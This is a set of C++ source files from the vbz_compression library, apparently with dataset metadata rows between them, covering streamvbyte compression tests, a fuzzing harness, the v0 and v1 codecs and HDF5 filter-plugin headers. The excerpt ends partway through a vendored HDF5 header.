#include "v0/vbz_streamvbyte.h" #include "v1/vbz_streamvbyte.h" #include "vbz.h" #include "test_utils.h" #include <numeric> #include <random> #include <catch2/catch.hpp> struct StreamVByteFunctions { using SizeFn = decltype(vbz_max_streamvbyte_compressed_size_v0)*; using CompressFn = decltype(vbz_delta_zig_zag_streamvbyte_compress_v0)*; using DecompressFn = decltype(vbz_delta_zig_zag_streamvbyte_decompress_v0)*; StreamVByteFunctions( SizeFn _size, CompressFn _compress, DecompressFn _decompress ) : size(_size) , compress(_compress) , decompress(_decompress) { } SizeFn size; CompressFn compress; DecompressFn decompress; }; StreamVByteFunctions const v0_functions{ vbz_max_streamvbyte_compressed_size_v0, vbz_delta_zig_zag_streamvbyte_compress_v0, vbz_delta_zig_zag_streamvbyte_decompress_v0 }; StreamVByteFunctions const v1_functions{ vbz_max_streamvbyte_compressed_size_v1, vbz_delta_zig_zag_streamvbyte_compress_v1, vbz_delta_zig_zag_streamvbyte_decompress_v1 }; template <typename T> void perform_streamvbyte_compression_test( StreamVByteFunctions fns, std::vector<T> const& data, bool use_delta_zig_zag) { INFO("Original " << dump_explicit<std::int64_t>(data)); auto const integer_size = sizeof(T); auto const input_byte_count = data.size() * integer_size; std::vector<std::int8_t> dest_buffer(fns.size(integer_size, vbz_size_t(input_byte_count))); auto final_byte_count = fns.compress( data.data(), vbz_size_t(data.size() * sizeof(data[0])), dest_buffer.data(), vbz_size_t(dest_buffer.size()), integer_size, use_delta_zig_zag); if (vbz_is_error(final_byte_count)) { FAIL("Got error from vbz_delta_zig_zag_streamvbyte_compress"); return; } dest_buffer.resize(final_byte_count); std::vector<int8_t> decompressed_bytes(data.size() * sizeof(data[0])); auto decompressed_byte_count = fns.decompress( dest_buffer.data(), vbz_size_t(dest_buffer.size()), decompressed_bytes.data(), vbz_size_t(decompressed_bytes.size()), integer_size, use_delta_zig_zag ); INFO("decompressed_bytes " << dump_explicit<std::int64_t>(decompressed_bytes)); if (vbz_is_error(decompressed_byte_count)) { FAIL("Got error from vbz_delta_zig_zag_streamvbyte_decompress"); return; } decompressed_bytes.resize(decompressed_byte_count); auto decompressed = gsl::make_span(decompressed_bytes).as_span<T>(); INFO("decompressed " << dump_explicit<std::int64_t>(decompressed)); THEN("Data is filtered and recovered correctly") { CHECK(decompressed == gsl::make_span(data)); } } template <typename T> void run_streamvbyte_compression_test_suite(StreamVByteFunctions fns) { GIVEN("Simple data to compress") { std::vector<T> simple_data(100); std::iota(simple_data.begin(), simple_data.end(), 0); WHEN("Compressing with no delta zig zag") { perform_streamvbyte_compression_test(fns, simple_data, false); } WHEN("Compressing with delta zig zag") { perform_streamvbyte_compression_test(fns, simple_data, true); } } GIVEN("Random data to compress") { std::vector<T> random_data(1000 * 1000); auto seed = std::random_device()(); INFO("Seed " << seed); std::default_random_engine rand(seed); // std::uniform_int_distribution<std::int8_t> has issues on some platforms - always use 32 bit engine std::uniform_int_distribution<std::int64_t> dist(std::numeric_limits<T>::min()/2, std::numeric_limits<T>::max()/2); for (auto& e : random_data) { e = T(dist(rand)); } WHEN("Compressing data") { perform_streamvbyte_compression_test(fns, random_data, std::is_signed<T>::value); } } } template <typename T> void perform_int_compressed_value_test( StreamVByteFunctions const& fns, std::vector<T> const& input_values, bool perform_zig_zag, std::vector<std::int8_t> const& expected_compressed) { GIVEN("A known set of input signed values") { WHEN("Compressing/decompressing the values") { perform_streamvbyte_compression_test(fns, input_values, true); perform_streamvbyte_compression_test(fns, input_values, false); } AND_WHEN("Compressing the values with delta zig zag") { std::vector<int8_t> dest_buffer(100); auto final_byte_count = fns.compress( input_values.data(), vbz_size_t(input_values.size() * sizeof(input_values[0])), dest_buffer.data(), vbz_size_t(dest_buffer.size()), sizeof(input_values[0]), perform_zig_zag); dest_buffer.resize(final_byte_count); THEN("The values are as expected") { INFO("Compressed " << dump_explicit<std::int64_t>(dest_buffer)); INFO("Expected " << dump_explicit<std::int64_t>(expected_compressed)); CHECK(expected_compressed == dest_buffer); } } } } SCENARIO("streamvbyte int8 encoding") { run_streamvbyte_compression_test_suite<std::int8_t>(v0_functions); } SCENARIO("streamvbyte int16 encoding") { run_streamvbyte_compression_test_suite<std::int16_t>(v0_functions); } SCENARIO("streamvbyte int32 encoding") { run_streamvbyte_compression_test_suite<std::int32_t>(v0_functions); } SCENARIO("streamvbyte uint8 encoding") { run_streamvbyte_compression_test_suite<std::uint8_t>(v0_functions); } SCENARIO("streamvbyte uint16 encoding") { run_streamvbyte_compression_test_suite<std::uint16_t>(v0_functions); } SCENARIO("streamvbyte uint32 encoding") { run_streamvbyte_compression_test_suite<std::uint32_t>(v0_functions); } SCENARIO("streamvbyte int16 encoding with known values.") { GIVEN("signed types functions") { std::vector<std::int16_t> const input_values{ 0, -1, 4, -9, 16, -25, 36, -49, 64, -81, 100 }; GIVEN("v0 functions") { std::vector<int8_t> compressed_values_v0{ 0, 0, 20, 0, 1, 10, 25, 50, 81, 122, -87, -30, 33, 1, 106, 1 }; perform_int_compressed_value_test(v0_functions, input_values, true, compressed_values_v0); } GIVEN("v1 functions") { std::vector<int8_t> compressed_values_v1{ 0, 0, 20, 0, 1, 10, 25, 50, 81, 122, -87, -30, 33, 1, 106, 1, }; perform_int_compressed_value_test(v1_functions, input_values, true, compressed_values_v1); } } GIVEN("unsigned signed types functions") { std::vector<std::uint16_t> input_values{ 0, 1, 4, 9, 16, 25, 36, 49, 64, 81, 100 }; GIVEN("v0 functions") { std::vector<int8_t> compressed_values_v0{ 0, 0, 0, 0, 1, 4, 9, 16, 25, 36, 49, 64, 81, 100 }; perform_int_compressed_value_test(v0_functions, input_values, false, compressed_values_v0); } GIVEN("v1 functions") { std::vector<int8_t> compressed_values_v1{ 0, 0, 0, 0, 1, 4, 9, 16, 25, 36, 49, 64, 81, 100 }; perform_int_compressed_value_test(v1_functions, input_values, false, compressed_values_v1); } } }
7,559
C++
.cpp
204
29.906863
123
0.637343
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,154
vbz_fuzz.cpp
nanoporetech_vbz_compression/vbz/fuzzing/vbz_fuzz.cpp
#include <vbz.h> #include <cstddef> #include <cstdint> #include <fstream> #include <iostream> #include <utility> #include <vector> #define DEBUG_LOGGING 0 template <typename... Args> void debug_log(Args&&... args) { #if DEBUG_LOGGING using expander = int[]; (void)expander{0, (void(std::cout << std::forward<Args>(args)), 0)...}; std::cout << std::endl; #endif } void run_vbz_test(const uint8_t* data, size_t size, CompressionOptions const& options) { // Try to compress random input data { auto max_size = vbz_max_compressed_size((vbz_size_t)size, &options); if (vbz_is_error(max_size)) { debug_log("compress: Error in size ", vbz_error_string(max_size)); max_size = size * 100; // make up a max value... } auto compressed = std::vector<char>(max_size); // run both sized and non-sized methods. auto compressed_size = vbz_compress_sized(data, size, compressed.data(), max_size, &options); if (vbz_is_error(compressed_size)) { debug_log("compress_sized: Error in compressed_size", vbz_error_string(compressed_size)); } else { debug_log("compress_sized: Compressed to ", compressed_size, " bytes"); compressed.resize(compressed_size); } compressed_size = vbz_compress(data, size, compressed.data(), max_size, &options); if (vbz_is_error(compressed_size)) { debug_log("compress: Error in compressed_size", vbz_error_string(compressed_size)); } else { debug_log("compress: Compressed to ", compressed_size, " bytes"); compressed.resize(compressed_size); } auto decompressed = std::vector<char>(size); auto decompressed_size = vbz_decompress(compressed.data(), compressed.size(), decompressed.data(), size, &options); if (vbz_is_error(decompressed_size)) { debug_log("compress_sized: Error in decompressed_size ", vbz_error_string(decompressed_size)); } else { debug_log("compress_sized: Decompressed to ", decompressed_size, " bytes"); } decompressed_size = vbz_decompress_sized(compressed.data(), compressed.size(), decompressed.data(), size, &options); if (vbz_is_error(decompressed_size)) { debug_log("compress: Error in decompressed_size ", vbz_error_string(decompressed_size)); } else { debug_log("compress: Decompressed to ", decompressed_size, " bytes"); } } // Try to decompress random input data... { auto const guess_destination_size = std::max(std::size_t(1024), size * 100); auto decompress_dest = std::vector<char>(guess_destination_size); // try both sized and non-sized methods. auto decompressed_size = vbz_decompress(data, size, decompress_dest.data(), guess_destination_size, &options); if (vbz_is_error(decompressed_size)) { debug_log("decompress_sized: Error in decompressed_size ", vbz_error_string(decompressed_size)); } decompressed_size = vbz_decompress_sized(data, size, decompress_dest.data(), guess_destination_size, &options); if (vbz_is_error(decompressed_size)) { debug_log("decompress: Error in decompressed_size ", vbz_error_string(decompressed_size)); } } } extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) { debug_log("Begin with ", size, " bytes"); // Run with zstd run_vbz_test(data, size, CompressionOptions{ true, 2, 1, VBZ_DEFAULT_VERSION }); // Run without zstd run_vbz_test(data, size, CompressionOptions{ true, 2, 0, VBZ_DEFAULT_VERSION }); return 0; }
3,829
C++
.cpp
95
32.863158
124
0.627757
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,155
vbz_streamvbyte.cpp
nanoporetech_vbz_compression/vbz/v0/vbz_streamvbyte.cpp
#include "vbz_streamvbyte.h" #include "vbz_streamvbyte_impl.h" #include "vbz.h" #include <gsl/gsl-lite.hpp> vbz_size_t vbz_max_streamvbyte_compressed_size_v0( std::size_t integer_size, vbz_size_t source_size) { if (source_size % integer_size != 0) { return VBZ_STREAMVBYTE_INPUT_SIZE_ERROR; } auto int_count = source_size / integer_size; return vbz_size_t(streamvbyte_max_compressedbytes(std::uint32_t(int_count))); } vbz_size_t vbz_delta_zig_zag_streamvbyte_compress_v0( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, int integer_size, bool use_delta_zig_zag_encoding) { if (source_size % integer_size != 0) { return VBZ_STREAMVBYTE_INPUT_SIZE_ERROR; } auto const input_span = gsl::make_span(static_cast<char const*>(source), source_size); auto const output_span = gsl::make_span(static_cast<char*>(destination), destination_capacity); switch(integer_size) { case 1: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int8_t, true>::compress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int8_t, false>::compress(input_span, output_span); } } case 2: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int16_t, true>::compress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int16_t, false>::compress(input_span, output_span); } } case 4: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int32_t, true>::compress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int32_t, false>::compress(input_span, output_span); } } default: return VBZ_STREAMVBYTE_INTEGER_SIZE_ERROR; } } vbz_size_t vbz_delta_zig_zag_streamvbyte_decompress_v0( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_size, int integer_size, bool use_delta_zig_zag_encoding) { if (destination_size % integer_size != 0) { return VBZ_STREAMVBYTE_DESTINATION_SIZE_ERROR; } auto const input_span = gsl::make_span(static_cast<char const*>(source), source_size); auto const output_span = gsl::make_span(static_cast<char*>(destination), destination_size); switch(integer_size) { case 1: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int8_t, true>::decompress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int8_t, false>::decompress(input_span, output_span); } } case 2: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int16_t, true>::decompress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int16_t, false>::decompress(input_span, output_span); } } case 4: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int32_t, true>::decompress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int32_t, false>::decompress(input_span, output_span); } } default: return VBZ_STREAMVBYTE_INTEGER_SIZE_ERROR; } }
3,656
C++
.cpp
101
27.405941
101
0.602825
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,156
vbz_streamvbyte.cpp
nanoporetech_vbz_compression/vbz/v1/vbz_streamvbyte.cpp
#include "vbz_streamvbyte.h" #include "vbz_streamvbyte_impl.h" #include "../v0/vbz_streamvbyte_impl.h" // for 4 byte case #include "vbz.h" #include <gsl/gsl-lite.hpp> vbz_size_t vbz_max_streamvbyte_compressed_size_v1( std::size_t integer_size, vbz_size_t source_size) { if (source_size % integer_size != 0) { return VBZ_STREAMVBYTE_INPUT_SIZE_ERROR; } auto int_count = source_size / integer_size; return vbz_size_t(streamvbyte_max_compressedbytes(std::uint32_t(int_count))); } vbz_size_t vbz_delta_zig_zag_streamvbyte_compress_v1( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, int integer_size, bool use_delta_zig_zag_encoding) { if (source_size % integer_size != 0) { return VBZ_STREAMVBYTE_INPUT_SIZE_ERROR; } auto const input_span = gsl::make_span(static_cast<char const*>(source), source_size); auto const output_span = gsl::make_span(static_cast<char*>(destination), destination_capacity); switch(integer_size) { case 1: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV1<std::int8_t, true>::compress(input_span, output_span); } else { return StreamVByteWorkerV1<std::int8_t, false>::compress(input_span, output_span); } } case 2: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int16_t, true>::compress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int16_t, false>::compress(input_span, output_span); } } case 4: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int32_t, true>::compress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int32_t, false>::compress(input_span, output_span); } } default: return VBZ_STREAMVBYTE_INTEGER_SIZE_ERROR; } } vbz_size_t vbz_delta_zig_zag_streamvbyte_decompress_v1( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_size, int integer_size, bool use_delta_zig_zag_encoding) { if (destination_size % integer_size != 0) { return VBZ_STREAMVBYTE_DESTINATION_SIZE_ERROR; } auto const input_span = gsl::make_span(static_cast<char const*>(source), source_size); auto const output_span = gsl::make_span(static_cast<char*>(destination), destination_size); switch(integer_size) { case 1: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV1<std::int8_t, true>::decompress(input_span, output_span); } else { return StreamVByteWorkerV1<std::int8_t, false>::decompress(input_span, output_span); } } // Integers larger than 1 byte have been shown to perform better (with zstd) when using version 0 compression // likely the increased noise in the key section reduces compression efficiency negating the benefits of // compressing 1 byte values into halfs. case 2: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int16_t, true>::decompress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int16_t, false>::decompress(input_span, output_span); } } case 4: { if (use_delta_zig_zag_encoding) { return StreamVByteWorkerV0<std::int32_t, true>::decompress(input_span, output_span); } else { return StreamVByteWorkerV0<std::int32_t, false>::decompress(input_span, output_span); } } default: return VBZ_STREAMVBYTE_INTEGER_SIZE_ERROR; } }
3,995
C++
.cpp
105
29.32381
117
0.613935
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,157
vbz_plugin_user_utils.h
nanoporetech_vbz_compression/vbz_plugin/vbz_plugin_user_utils.h
#pragma once #include <hdf5.h> #include "vbz_plugin.h" #define FILTER_VBZ_VERSION 1 extern "C" const void* vbz_plugin_info(void); /// \brief Call to enable the vbz filter on the specified creation properties. /// \param integer_size Size of integer type to be compressed. Leave at 0 to extract this information from the hdf type. /// \param use_zig_zag Control if zig zag encoding should be used on the type. If integer_size is not specified then the /// hdf type's signedness is used to fill in this field. /// \param zstd_compression_level Control the level of compression used to filter the dataset. /// \param vbz_version The version of compression to apply to user data. inline int vbz_filter_enable_versioned( hid_t creation_properties, unsigned int integer_size, bool use_zig_zag, unsigned int zstd_compression_level, int vbz_version) { unsigned int values[4] = { (unsigned int)vbz_version, integer_size, use_zig_zag, zstd_compression_level }; return H5Pset_filter(creation_properties, FILTER_VBZ_ID, 0, 4, values); } /// \brief Call to enable the vbz filter on the specified creation properties. /// \param integer_size Size of integer type to be compressed. Leave at 0 to extract this information from the hdf type. /// \param use_zig_zag Control if zig zag encoding should be used on the type. If integer_size is not specified then the /// hdf type's signedness is used to fill in this field. /// \param zstd_compression_level Control the level of compression used to filter the dataset. inline int vbz_filter_enable( hid_t creation_properties, unsigned int integer_size, bool use_zig_zag, unsigned int zstd_compression_level) { return vbz_filter_enable_versioned( creation_properties, integer_size, use_zig_zag, zstd_compression_level, FILTER_VBZ_VERSION ); } inline bool vbz_register() { int retval = H5Zregister(vbz_plugin_info()); if (retval < 0) { return 0; } return 1; }
2,182
C++
.h
54
36.37037
133
0.676887
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,158
vbz_plugin.h
nanoporetech_vbz_compression/vbz_plugin/vbz_plugin.h
#pragma once /// Filter ID /// \todo Register with hdf group #define FILTER_VBZ_ID 32020 #define FILTER_VBZ_VERSION_OPTION 0 #define FILTER_VBZ_INTEGER_SIZE_OPTION 1 #define FILTER_VBZ_USE_DELTA_ZIG_ZAG_COMPRESSION 2 #define FILTER_VBZ_ZSTD_COMPRESSION_LEVEL_OPTION 3
307
C++
.h
8
37.125
53
0.703704
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,159
hdf5_dynamic.h
nanoporetech_vbz_compression/vbz_plugin/hdf5_dynamic.h
#pragma once #include <dlfcn.h> #include <iostream> typedef int herr_t; typedef int H5Z_filter_t; typedef int htri_t; #ifdef HDF5_1_10_BUILD typedef int64_t hid_t; #else typedef int32_t hid_t; #endif #define H5E_DEFAULT (hid_t)0 #define H5E_CANTREGISTER (*hdf5_dynamic::H5E_CANTREGISTER_g) #define H5Z_FLAG_REVERSE 0x0100 /*reverse direction; read */ #define H5Z_CLASS_T_VERS (1) #define H5E_ERR_CLS (*hdf5_dynamic::H5E_ERR_CLS_g) #define H5E_CALLBACK (*hdf5_dynamic::H5E_CALLBACK_g) #define H5E_PLINE (*hdf5_dynamic::H5E_PLINE_g) #define H5T_NATIVE_UCHAR (*hdf5_dynamic::H5T_NATIVE_UCHAR_g) #define H5T_NATIVE_UINT8 (*hdf5_dynamic::H5T_NATIVE_UINT8_g) #define H5T_NATIVE_USHORT (*hdf5_dynamic::H5T_NATIVE_USHORT_g) #define H5T_NATIVE_UINT16 (*hdf5_dynamic::H5T_NATIVE_UINT16_g) #define H5T_NATIVE_UINT (*hdf5_dynamic::H5T_NATIVE_UINT_g) #define H5T_NATIVE_UINT32 (*hdf5_dynamic::H5T_NATIVE_UINT32_g) namespace hdf5_dynamic { void* lookup_symbol(char const* name) { auto lib_handle = RTLD_DEFAULT; if (auto lib_name = getenv("HDF5_LIB_PATH")) { std::cout << "Lookup symbols in specific lib " << lib_name << std::endl; lib_handle = dlopen(lib_name, RTLD_LAZY|RTLD_GLOBAL); if (!lib_handle) { std::cerr << dlerror() << std::endl; std::abort(); } } auto sym = dlsym(lib_handle, name); std::cout << "Lookup symbol " << name << ": " << sym << std::endl; if (!sym) { std::cerr << dlerror() << std::endl; std::abort(); } } template<typename Signature> class FunctionLookup; template<typename Ret, typename... Args> class FunctionLookup<Ret(Args...)> { public: using FunctionPtrType = Ret(*)(Args...); static FunctionPtrType lookup(char const* name) { return (FunctionPtrType)lookup_symbol(name); } }; template <typename T> class GlobalLookup { public: static T* lookup(char const* name) { return (T*)lookup_symbol(name); } }; typedef htri_t (*H5Z_can_apply_func_t)(hid_t dcpl_id, hid_t type_id, hid_t space_id); typedef herr_t (*H5Z_set_local_func_t)(hid_t dcpl_id, hid_t type_id, hid_t space_id); typedef size_t (*H5Z_func_t)(unsigned int flags, size_t cd_nelmts, const unsigned int cd_values[], size_t nbytes, size_t *buf_size, void **buf); typedef struct H5Z_class_t { int version; /* Version number of the H5Z_class_t struct */ H5Z_filter_t id; /* Filter ID number */ unsigned encoder_present; /* Does this filter have an encoder? */ unsigned decoder_present; /* Does this filter have a decoder? */ const char *name; /* Comment for debugging */ H5Z_can_apply_func_t can_apply; /* The "can apply" callback for a filter */ H5Z_set_local_func_t set_local; /* The "set local" callback for a filter */ H5Z_func_t filter; /* The actual filter function */ } H5Z_class_t; typedef enum H5PL_type_t { H5PL_TYPE_ERROR = -1, /* Error */ H5PL_TYPE_FILTER = 0, /* Filter */ H5PL_TYPE_NONE = 1 /* This must be last! */ } H5PL_type_t; namespace function_defs { herr_t H5check_version(unsigned majnum, unsigned minnum, unsigned relnum); herr_t H5Pget_filter_by_id2(hid_t plist_id, H5Z_filter_t id, unsigned int *flags/*out*/, size_t *cd_nelmts/*out*/, unsigned cd_values[]/*out*/, size_t namelen, char name[]/*out*/, unsigned *filter_config/*out*/); herr_t H5Pmodify_filter(hid_t plist_id, H5Z_filter_t filter, unsigned int flags, size_t cd_nelmts, const unsigned int cd_values[/*cd_nelmts*/]); herr_t H5Zregister(const void *cls); size_t H5Tget_size(hid_t type_id); size_t H5Tget_size(hid_t type_id); herr_t H5Epush2(hid_t err_stack, const char *file, const char *func, unsigned line, hid_t cls_id, hid_t maj_id, hid_t min_id, const char *msg, ...); } static auto H5check_version = FunctionLookup<decltype(function_defs::H5check_version)>::lookup("H5check_version"); static auto H5Pget_filter_by_id2 = FunctionLookup<decltype(function_defs::H5Pget_filter_by_id2)>::lookup("H5Pget_filter_by_id2"); static auto H5Pmodify_filter = FunctionLookup<decltype(function_defs::H5Pmodify_filter)>::lookup("H5Pmodify_filter"); static auto H5Zregister = FunctionLookup<decltype(function_defs::H5Zregister)>::lookup("H5Zregister"); static auto H5Tget_size = FunctionLookup<decltype(function_defs::H5Tget_size)>::lookup("H5Tget_size"); // Uses c varargs so a bit trickier to templatise using H5Epush2Type = decltype(function_defs::H5Epush2); static auto H5Epush2 = (H5Epush2Type*)lookup_symbol("H5Epush2"); hid_t* H5E_ERR_CLS_g = GlobalLookup<hid_t>::lookup("H5E_ERR_CLS_g"); hid_t* H5E_CANTREGISTER_g = GlobalLookup<hid_t>::lookup("H5E_CANTREGISTER_g"); hid_t* H5E_CALLBACK_g = GlobalLookup<hid_t>::lookup("H5E_CALLBACK_g"); hid_t* H5E_PLINE_g = GlobalLookup<hid_t>::lookup("H5E_PLINE_g"); hid_t* H5T_NATIVE_UCHAR_g = GlobalLookup<hid_t>::lookup("H5T_NATIVE_UCHAR_g"); hid_t* H5T_NATIVE_UINT8_g = GlobalLookup<hid_t>::lookup("H5T_NATIVE_UINT8_g"); hid_t* H5T_NATIVE_USHORT_g = GlobalLookup<hid_t>::lookup("H5T_NATIVE_USHORT_g"); hid_t* H5T_NATIVE_UINT16_g = GlobalLookup<hid_t>::lookup("H5T_NATIVE_UINT16_g"); hid_t* H5T_NATIVE_UINT_g = GlobalLookup<hid_t>::lookup("H5T_NATIVE_UINT_g"); hid_t* H5T_NATIVE_UINT32_g = GlobalLookup<hid_t>::lookup("H5T_NATIVE_UINT32_g"); }
5,618
C++
.h
122
42.778689
129
0.661974
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,160
test_utils.h
nanoporetech_vbz_compression/vbz_plugin/test/test_utils.h
#pragma once #include "hdf_id_helper.h" #include <vector> using namespace ont::hdf5; template <typename T> std::vector<T> read_1d_dataset( hid_t parent, char const* name, hid_t expected_type ) { if (H5Lexists(parent, name, H5P_DEFAULT) < 0) { return {}; } auto dataset = IdRef::claim(H5Dopen(parent, name, H5P_DEFAULT)); auto type = IdRef::claim(H5Dget_type(dataset.get())); auto dataspace = IdRef::claim(H5Dget_space(dataset.get())); if (H5Tequal(type.get(), expected_type) < 0) { return {}; } const int ndims = H5Sget_simple_extent_ndims(dataspace.get()); if (ndims != 1) { throw std::runtime_error("dataset isn't 1d"); } hsize_t dims[1]; H5Sget_simple_extent_dims(dataspace.get(), dims, NULL); std::vector<T> values(dims[0]); auto buffer_space = IdRef::claim( H5Screate_simple(1, dims, dims)); if (H5Dread( dataset.get(), expected_type, buffer_space.get(), H5S_ALL, H5P_DEFAULT, values.data()) < 0) { return {}; } return values; } IdRef create_dataset( hid_t parent, char const* name, hid_t type, std::size_t size, hid_t dataset_creation_properties) { auto data_space = IdRef::claim(H5Screate(H5S_SIMPLE)); hsize_t size_arr[] = { size }; hsize_t max_size_arr[] = { size }; if (H5Sset_extent_simple( data_space.get(), 1, size_arr, max_size_arr) < 0) { return IdRef(); } auto dataset_id = IdRef::claim(H5Dcreate( parent, name, type, data_space.get(), H5P_DEFAULT, dataset_creation_properties, H5P_DEFAULT ) ); return dataset_id; } template <typename T> bool write_full_dataset( hid_t dataset, hid_t type, T const& data ) { if (H5Dwrite( dataset, type, H5S_ALL, H5S_ALL, H5P_DEFAULT, data.data() ) < 0) { return false; } return true; }
2,099
C++
.h
94
16.404255
68
0.572365
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,161
hdf_id_helper.h
nanoporetech_vbz_compression/vbz_plugin/hdf_test_utils/hdf_id_helper.h
#pragma once #include <cassert> #include <cstdint> #include <stdexcept> #include <utility> #include <hdf5.h> namespace ont { namespace hdf5 { /// Thrown when something goes wrong internally in HDF5. class Exception : public std::runtime_error { public: Exception() : std::runtime_error("HDF5 exception") { } }; /// An HDF5 identifier. /// /// IdRef should be used by anything that wants to keep a reference to a HDF5 /// object. using Id = hid_t; /// Maintains a reference to an HDF5 identifier. /// /// When you first create the identifier, use IdRef::claim() to grab it and make /// sure it will be closed. class IdRef final { public: /// Create an IdRef that takes ownership of an existing reference. /// /// This is intended for use when you receive an ID from the HDF5 library. /// /// The reference counter will be decremented on destruction, but will not /// be incremented. static IdRef claim(Id id); /// Create an IdRef that takes a new reference to the ID. /// /// The reference counter will be incremented on creation, and decremented /// on destruction. static IdRef ref(Id id); /// Create an IdRef that refers to a global ID. /// /// No reference counting will be done. static IdRef global(Id id) { return IdRef(id, true); } /// Create an IdRef that refers to a global ID. This call /// takes a non-global id and makes it global. /// /// No reference counting will be done. static IdRef global_ref(Id id); /// Create an invalid IdRef. /// /// The only use for the resulting object is to copy or move into it. IdRef() = default; IdRef(IdRef const& other); IdRef& operator=(IdRef const&); IdRef(IdRef && other) : m_id(other.m_id) , m_is_global_constant(other.m_is_global_constant) { other.m_id = -1; other.m_is_global_constant = false; } IdRef& operator=(IdRef && other) { std::swap(m_id, other.m_id); std::swap(m_is_global_constant, other.m_is_global_constant); return *this; } ~IdRef(); void swap(IdRef & other) { std::swap(m_id, other.m_id); std::swap(m_is_global_constant, other.m_is_global_constant); } /// Take ownership of the ID. /// /// This object will no longer hold a reference to the ID. It is up to the /// called to deref the ID. Id release() { Id id = m_id; m_id = -1; m_is_global_constant = false; return id; } /// Get the ID. /// /// The reference count will not be changed. This is mostly for passing into /// HDF5 function calls. Id get() const { assert(m_id >= 0); return m_id; } /// Get the reference count of the ID. int ref_count() const; /// Check whether this IdRef contains an ID. /// /// Note that it does not check whether HDF5 thinks the ID is valid. explicit operator bool() const { return m_id >= 0; } private: // use claim() or ref() explicit IdRef(Id id) : m_id(id), m_is_global_constant(false) {} explicit IdRef(Id id, bool is_global) : m_id(id) , m_is_global_constant(is_global) {} Id m_id = -1; bool m_is_global_constant = false; }; }}
3,320
C++
.h
112
24.75
80
0.627039
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,164
hdf5_plugin_types.h
nanoporetech_vbz_compression/third_party/hdf5/hdf5_plugin_types.h
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * Copyright by The HDF Group. * * All rights reserved. * * * * This file is part of HDF5. The full HDF5 copyright notice, including * * terms governing use, modification, and redistribution, is contained in * * the COPYING file, which can be found at the root of the source code * * distribution tree, or in https://support.hdfgroup.org/ftp/HDF5/releases. * * If you do not have access to either file, you may request a copy from * * help@hdfgroup.org. * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ /* * Purpose: Header file for writing external HDF5 plugins. */ #ifndef _H5PLextern_H #define _H5PLextern_H #ifdef __cplusplus extern "C" { #endif typedef enum H5PL_type_t { H5PL_TYPE_ERROR = -1, /* Error */ H5PL_TYPE_FILTER = 0, /* Filter */ H5PL_TYPE_NONE = 1 /* This must be last! */ } H5PL_type_t; #define H5Z_CLASS_T_VERS (1) #define H5Z_FLAG_REVERSE 0x0100 /*reverse direction; read */ /* * Filter identifiers. Values 0 through 255 are for filters defined by the * HDF5 library. Values 256 through 511 are available for testing new * filters. Subsequent values should be obtained from the HDF5 development * team at hdf5dev@ncsa.uiuc.edu. These values will never change because they * appear in the HDF5 files. */ typedef int H5Z_filter_t; /* * A filter gets definition flags and invocation flags (defined above), the * client data array and size defined when the filter was added to the * pipeline, the size in bytes of the data on which to operate, and pointers * to a buffer and its allocated size. * * The filter should store the result in the supplied buffer if possible, * otherwise it can allocate a new buffer, freeing the original. The * allocated size of the new buffer should be returned through the BUF_SIZE * pointer and the new buffer through the BUF pointer. * * The return value from the filter is the number of bytes in the output * buffer. If an error occurs then the function should return zero and leave * all pointer arguments unchanged. */ typedef size_t (*H5Z_func_t)(unsigned int flags, size_t cd_nelmts, const unsigned int cd_values[], size_t nbytes, size_t *buf_size, void **buf); /* * The filter table maps filter identification numbers to structs that * contain a pointers to the filter function and timing statistics. */ typedef struct H5Z_class2_t { int version; /* Version number of the H5Z_class_t struct */ H5Z_filter_t id; /* Filter ID number */ unsigned encoder_present; /* Does this filter have an encoder? */ unsigned decoder_present; /* Does this 